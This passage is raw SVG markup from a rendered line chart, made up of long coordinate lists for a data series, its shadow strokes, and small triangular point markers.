208.19258779428841 L 341.74598930481284 208.19258779428841 L 343.7216280451575 208.19258779428841 L 345.6972667855021 208.19258779428841 L 347.6729055258467 208.19258779428841 L 349.6485442661913 208.19258779428841 L 351.624183006536 208.19258779428841 L 353.5998217468806 208.19258779428841 L 355.5754604872252 208.19258779428841 L 357.55109922756986 208.19258779428841 L 359.52673796791447 208.19258779428841 L 361.5023767082591 208.19258779428841 L 363.4780154486037 208.19258779428841 L 365.45365418894835 208.19258779428841 L 367.42929292929296 208.19258779428841 L 369.40493166963756 208.19258779428841 L 371.3805704099822 208.19258779428841 L 373.35620915032683 208.19258779428841 L 375.33184789067144 208.19258779428841 L 377.30748663101605 208.19258779428841 L 379.2831253713607 208.19258779428841 L 381.2587641117053 208.19258779428841 L 383.2344028520499 208.19258779428841 L 385.2100415923946 208.19258779428841 L 387.1856803327392 208.19258779428841 L 389.1613190730838 208.19258779428841 L 391.1369578134284 208.19258779428841 L 393.1125965537731 208.19258779428841 L 395.0882352941177 208.19258779428841" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.3976502857143 L 177.76797385620918 253.10150820571428 L 179.74361259655382 252.84318646857142 L 181.71925133689842 252.60570989714284 L 183.69489007724306 252.60570989714284 L 185.67052881758767 252.60570989714284 L 187.6461675579323 252.60570989714284 L 189.6218062982769 252.60570989714284 L 191.59744503862154 252.60570989714284 L 193.57308377896615 252.60570989714284 L 195.5487225193108 252.60570989714284 L 197.52436125965542 252.60570989714284 L 199.50000000000003 252.60570989714284 L 201.47563874034466 252.60570989714284 L 203.45127748068927 250.98599789714285 L 205.4269162210339 250.98599789714285 L 207.4025549613785 250.98599789714285 L 209.37819370172315 250.98599789714285 L 211.35383244206778 250.98599789714285 L 213.3294711824124 250.98599789714285 L 215.30510992275703 250.98599789714285 L 217.28074866310163 250.98599789714285 L 219.25638740344627 250.98599789714285 L 221.23202614379088 250.98599789714285 L 223.2076648841355 250.4364527542857 L 225.18330362448012 249.93511332571427 L 227.15894236482475 249.93511332571427 L 229.1345811051694 249.53982646857145 L 231.110219845514 249.53982646857145 L 233.08585858585863 249.53982646857145 L 235.06149732620324 249.53982646857145 L 237.03713606654787 249.53982646857145 L 239.01277480689248 249.53982646857145 L 240.98841354723712 249.53982646857145 L 242.96405228758175 249.53982646857145 L 244.93969102792636 249.53982646857145 L 246.915329768271 249.53982646857145 L 248.8909685086156 249.53982646857145 L 250.86660724896024 249.53982646857145 L 252.84224598930484 249.53982646857145 L 254.81788472964945 249.53982646857145 L 256.79352346999406 249.53982646857145 L 258.7691622103387 248.86735393523855 L 260.7448009506833 247.3421166780957 L 262.72043969102793 245.7781879923814 L 264.69607843137254 244.8127543923814 L 266.6717171717172 243.33746784000272 L 268.6473559120618 243.33746784000272 L 270.6229946524064 240.63312726857413 L 272.598633392751 239.97671766857414 L 274.5742721330957 239.53577238857414 L 276.5499108734403 238.19585650285984 L 278.5255496137849 236.10180027428842 L 280.50118835412957 234.534150445717 L 282.4768270944742 234.534150445717 L 284.4524658348188 234.26227021714556 L 286.4281045751634 233.96496781714555 L 288.40374331550805 233.41542267428844 L 290.37938205585266 232.85141581714555 L 292.35502079619727 231.14493353143126 L 294.33065953654193 226.42077353143128 L 296.30629827688654 225.04259753143128 L 298.28193701723114 220.39556667428843 L 300.25757575757575 219.74250610285986 L 302.2332144979204 215.66785467428844 L 304.208853238265 214.29103181714726 L 306.1844919786096 213.48981901714558 L 308.1601307189543 212.21140347428843 L 310.1357694592989 211.19806861714557 L 312.1114081996435 210.66261476571697 L 314.0870469399881 209.9221749942884 L 316.0626856803328 209.65511533714556 L 318.0383244206774 208.45868333714554 L 320.013963161022 208.19258779428841 L 321.98960190136665 208.19258779428841 L 323.96524064171126 208.19258779428841 L 325.94087938205587 208.19258779428841 L 327.9165181224005 208.19258779428841 L 329.89215686274514 208.19258779428841 L 331.86779560308975 208.19258779428841 L 333.84343434343435 208.19258779428841 L 335.81907308377896 208.19258779428841 L 337.7947118241236 208.19258779428841 L 339.77035056446823 208.19258779428841 L 341.74598930481284 208.19258779428841 L 343.7216280451575 208.19258779428841 L 345.6972667855021 208.19258779428841 L 347.6729055258467 208.19258779428841 L 349.6485442661913 208.19258779428841 L 351.624183006536 208.19258779428841 L 353.5998217468806 208.19258779428841 L 355.5754604872252 208.19258779428841 L 357.55109922756986 208.19258779428841 L 359.52673796791447 208.19258779428841 L 361.5023767082591 208.19258779428841 L 363.4780154486037 208.19258779428841 L 365.45365418894835 208.19258779428841 L 367.42929292929296 208.19258779428841 L 369.40493166963756 208.19258779428841 L 371.3805704099822 208.19258779428841 L 373.35620915032683 208.19258779428841 L 375.33184789067144 208.19258779428841 L 377.30748663101605 208.19258779428841 L 379.2831253713607 208.19258779428841 L 381.2587641117053 208.19258779428841 L 383.2344028520499 208.19258779428841 L 385.2100415923946 208.19258779428841 L 387.1856803327392 208.19258779428841 L 389.1613190730838 208.19258779428841 L 391.1369578134284 208.19258779428841 L 393.1125965537731 208.19258779428841 L 395.0882352941177 208.19258779428841" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.3976502857143 L 177.76797385620918 253.10150820571428 L 179.74361259655382 252.84318646857142 L 181.71925133689842 252.60570989714284 L 183.69489007724306 252.60570989714284 L 185.67052881758767 252.60570989714284 L 187.6461675579323 252.60570989714284 L 189.6218062982769 252.60570989714284 L 191.59744503862154 252.60570989714284 L 193.57308377896615 252.60570989714284 L 195.5487225193108 252.60570989714284 L 197.52436125965542 252.60570989714284 L 199.50000000000003 252.60570989714284 L 201.47563874034466 252.60570989714284 L 203.45127748068927 250.98599789714285 L 205.4269162210339 250.98599789714285 L 207.4025549613785 250.98599789714285 L 209.37819370172315 250.98599789714285 L 211.35383244206778 250.98599789714285 L 213.3294711824124 250.98599789714285 L 215.30510992275703 250.98599789714285 L 217.28074866310163 250.98599789714285 L 219.25638740344627 250.98599789714285 L 221.23202614379088 250.98599789714285 L 223.2076648841355 250.4364527542857 L 225.18330362448012 249.93511332571427 L 227.15894236482475 249.93511332571427 L 229.1345811051694 249.53982646857145 L 231.110219845514 249.53982646857145 L 233.08585858585863 249.53982646857145 L 235.06149732620324 249.53982646857145 L 237.03713606654787 249.53982646857145 L 239.01277480689248 249.53982646857145 L 240.98841354723712 249.53982646857145 L 242.96405228758175 249.53982646857145 L 244.93969102792636 249.53982646857145 L 246.915329768271 249.53982646857145 L 248.8909685086156 249.53982646857145 L 250.86660724896024 249.53982646857145 L 252.84224598930484 249.53982646857145 L 254.81788472964945 249.53982646857145 L 256.79352346999406 249.53982646857145 L 258.7691622103387 248.86735393523855 L 260.7448009506833 247.3421166780957 L 262.72043969102793 245.7781879923814 L 264.69607843137254 244.8127543923814 L 266.6717171717172 243.33746784000272 L 268.6473559120618 243.33746784000272 L 270.6229946524064 240.63312726857413 L 272.598633392751 239.97671766857414 L 274.5742721330957 239.53577238857414 L 276.5499108734403 238.19585650285984 L 278.5255496137849 236.10180027428842 L 280.50118835412957 234.534150445717 L 282.4768270944742 234.534150445717 L 284.4524658348188 234.26227021714556 L 286.4281045751634 233.96496781714555 L 288.40374331550805 233.41542267428844 L 290.37938205585266 232.85141581714555 L 292.35502079619727 231.14493353143126 L 294.33065953654193 226.42077353143128 L 296.30629827688654 225.04259753143128 L 298.28193701723114 220.39556667428843 L 300.25757575757575 219.74250610285986 L 302.2332144979204 215.66785467428844 L 304.208853238265 214.29103181714726 L 306.1844919786096 213.48981901714558 L 308.1601307189543 212.21140347428843 L 310.1357694592989 211.19806861714557 L 312.1114081996435 210.66261476571697 L 314.0870469399881 209.9221749942884 L 316.0626856803328 209.65511533714556 L 318.0383244206774 208.45868333714554 L 320.013963161022 208.19258779428841 L 321.98960190136665 208.19258779428841 L 323.96524064171126 208.19258779428841 L 325.94087938205587 208.19258779428841 L 327.9165181224005 208.19258779428841 L 329.89215686274514 208.19258779428841 L 331.86779560308975 208.19258779428841 L 333.84343434343435 208.19258779428841 L 335.81907308377896 208.19258779428841 L 337.7947118241236 208.19258779428841 L 339.77035056446823 208.19258779428841 L 341.74598930481284 208.19258779428841 L 343.7216280451575 208.19258779428841 L 345.6972667855021 208.19258779428841 L 347.6729055258467 208.19258779428841 L 349.6485442661913 208.19258779428841 L 351.624183006536 208.19258779428841 L 353.5998217468806 208.19258779428841 L 355.5754604872252 208.19258779428841 L 357.55109922756986 208.19258779428841 L 359.52673796791447 208.19258779428841 L 361.5023767082591 208.19258779428841 L 363.4780154486037 208.19258779428841 L 365.45365418894835 208.19258779428841 L 367.42929292929296 208.19258779428841 L 369.40493166963756 208.19258779428841 L 371.3805704099822 208.19258779428841 L 373.35620915032683 208.19258779428841 L 375.33184789067144 208.19258779428841 L 377.30748663101605 208.19258779428841 L 379.2831253713607 208.19258779428841 L 381.2587641117053 208.19258779428841 L 383.2344028520499 208.19258779428841 L 385.2100415923946 208.19258779428841 L 387.1856803327392 208.19258779428841 L 389.1613190730838 208.19258779428841 L 391.1369578134284 208.19258779428841 L 393.1125965537731 208.19258779428841 L 395.0882352941177 208.19258779428841" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.3976502857143 L 177.76797385620918 253.10150820571428 L 179.74361259655382 252.84318646857142 L 181.71925133689842 252.60570989714284 L 183.69489007724306 252.60570989714284 L 185.67052881758767 252.60570989714284 L 187.6461675579323 252.60570989714284 L 189.6218062982769 252.60570989714284 L 191.59744503862154 252.60570989714284 L 193.57308377896615 252.60570989714284 L 195.5487225193108 252.60570989714284 L 197.52436125965542 252.60570989714284 L 199.50000000000003 252.60570989714284 L 201.47563874034466 252.60570989714284 L 203.45127748068927 250.98599789714285 L 205.4269162210339 250.98599789714285 L 207.4025549613785 250.98599789714285 L 209.37819370172315 250.98599789714285 L 211.35383244206778 250.98599789714285 L 213.3294711824124 250.98599789714285 L 215.30510992275703 250.98599789714285 L 217.28074866310163 250.98599789714285 L 219.25638740344627 250.98599789714285 L 221.23202614379088 250.98599789714285 L 223.2076648841355 250.4364527542857 L 225.18330362448012 249.93511332571427 L 227.15894236482475 249.93511332571427 L 229.1345811051694 249.53982646857145 L 231.110219845514 249.53982646857145 L 233.08585858585863 249.53982646857145 L 235.06149732620324 249.53982646857145 L 237.03713606654787 249.53982646857145 L 239.01277480689248 249.53982646857145 L 240.98841354723712 249.53982646857145 L 242.96405228758175 249.53982646857145 L 244.93969102792636 249.53982646857145 L 246.915329768271 249.53982646857145 L 248.8909685086156 249.53982646857145 L 250.86660724896024 249.53982646857145 L 252.84224598930484 249.53982646857145 L 254.81788472964945 249.53982646857145 L 256.79352346999406 249.53982646857145 L 258.7691622103387 248.86735393523855 L 260.7448009506833 247.3421166780957 L 262.72043969102793 245.7781879923814 L 264.69607843137254 244.8127543923814 L 266.6717171717172 243.33746784000272 L 268.6473559120618 243.33746784000272 L 270.6229946524064 240.63312726857413 L 272.598633392751 239.97671766857414 L 274.5742721330957 239.53577238857414 L 276.5499108734403 238.19585650285984 L 278.5255496137849 236.10180027428842 L 280.50118835412957 234.534150445717 L 282.4768270944742 234.534150445717 L 284.4524658348188 234.26227021714556 L 286.4281045751634 233.96496781714555 L 288.40374331550805 233.41542267428844 L 290.37938205585266 232.85141581714555 L 292.35502079619727 231.14493353143126 L 294.33065953654193 226.42077353143128 L 296.30629827688654 225.04259753143128 L 298.28193701723114 220.39556667428843 L 300.25757575757575 219.74250610285986 L 302.2332144979204 215.66785467428844 L 304.208853238265 214.29103181714726 L 306.1844919786096 213.48981901714558 L 308.1601307189543 212.21140347428843 L 310.1357694592989 211.19806861714557 L 312.1114081996435 210.66261476571697 L 314.0870469399881 209.9221749942884 L 316.0626856803328 209.65511533714556 L 318.0383244206774 208.45868333714554 L 320.013963161022 208.19258779428841 L 321.98960190136665 208.19258779428841 L 323.96524064171126 208.19258779428841 L 325.94087938205587 208.19258779428841 L 327.9165181224005 208.19258779428841 L 329.89215686274514 208.19258779428841 L 331.86779560308975 208.19258779428841 L 333.84343434343435 208.19258779428841 L 335.81907308377896 208.19258779428841 L 337.7947118241236 208.19258779428841 L 339.77035056446823 208.19258779428841 L 341.74598930481284 208.19258779428841 L 343.7216280451575 208.19258779428841 L 345.6972667855021 208.19258779428841 L 347.6729055258467 208.19258779428841 L 349.6485442661913 208.19258779428841 L 351.624183006536 208.19258779428841 L 353.5998217468806 208.19258779428841 L 355.5754604872252 208.19258779428841 L 357.55109922756986 208.19258779428841 L 359.52673796791447 208.19258779428841 L 361.5023767082591 208.19258779428841 L 363.4780154486037 208.19258779428841 L 365.45365418894835 208.19258779428841 L 367.42929292929296 208.19258779428841 L 369.40493166963756 208.19258779428841 L 371.3805704099822 208.19258779428841 L 373.35620915032683 208.19258779428841 L 375.33184789067144 208.19258779428841 L 377.30748663101605 208.19258779428841 L 379.2831253713607 208.19258779428841 L 381.2587641117053 208.19258779428841 L 383.2344028520499 208.19258779428841 L 385.2100415923946 208.19258779428841 L 387.1856803327392 208.19258779428841 L 389.1613190730838 208.19258779428841 L 391.1369578134284 208.19258779428841 L 393.1125965537731 208.19258779428841 L 395.0882352941177 208.19258779428841" fill="none" stroke="#7798BF" stroke-width="2"></path><path d="M 395 213.32 L 391 205.32 399 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 393 213.32 L 389 205.32 397 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 391 213.32 L 387 205.32 395 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 389 213.32 L 385 205.32 393 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 387 213.32 L 383 205.32 391 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 385 213.32 L 381 205.32 389 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 383 213.32 L 379 205.32 387 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 213.32 L 377.5 205.32 385.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 379.5 213.32 L 375.5 205.32 383.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 377.5 213.32 L 373.5 205.32 381.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 375.5 213.32 L 371.5 205.32 379.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 213.32 L 369.5 205.32 377.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 371.5 213.32 L 367.5 205.32 375.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 369.5 213.32 L 365.5 205.32 373.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 213.32 L 363.5 205.32 371.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 365.5 213.32 L 361.5 205.32 369.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 363.5 213.32 L 359.5 205.32 367.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 213.32 L 357.5 205.32 365.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 359.5 213.32 L 355.5 205.32 363.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 357.5 213.32 L 353.5 205.32 361.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 213.32 L 351.5 205.32 359.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 353.5 213.32 L 349.5 205.32 357.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 351.5 213.32 L 347.5 205.32 355.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 349.5 213.32 L 345.5 205.32 353.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 213.32 L 343.5 205.32 351.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 213.32 L 341.5 205.32 349.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 213.32 L 339.5 205.32 347.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 213.32 L 337.5 205.32 345.5 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 340 213.32 L 336 205.32 344 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 338 213.32 L 334 205.32 342 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 336 213.32 L 332 205.32 340 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 334 213.32 L 330 205.32 338 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 332 213.32 L 328 205.32 336 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 330 213.32 L 326 205.32 334 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 328 213.32 L 324 205.32 332 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 326 213.32 L 322 205.32 330 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 324 213.32 L 320 205.32 328 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 322 213.32 L 318 205.32 326 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 320 213.32 L 316 205.32 324 205.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 318 213.82 L 314 205.82 322 205.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 316 214.82 L 312 206.82 320 206.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 314 215.32 L 310 207.32 318 207.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 312 215.82 L 308 207.82 316 207.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 310 216.32 L 306 208.32 314 208.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 308 217.32 L 304 209.32 312 209.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 306 218.82 L 302 210.82 310 210.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 304 219.82 L 300 211.82 308 211.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 302 220.82 L 298 212.82 306 212.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 224.82 L 296.5 216.82 304.5 216.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 225.82 L 294.5 217.82 302.5 217.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 230.32 L 292.5 222.32 300.5 222.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 231.82 L 290.5 223.82 298.5 223.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 236.32 L 288.5 228.32 296.5 228.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 238.32 L 286.5 230.32 294.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 238.82 L 284.5 230.82 292.5 230.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 239.32 L 282.5 231.32 290.5 231.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 239.82 L 280.5 231.82 288.5 231.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 239.82 L 278.5 231.82 286.5 231.82 Z" fill="#7798BF" stroke="#333" 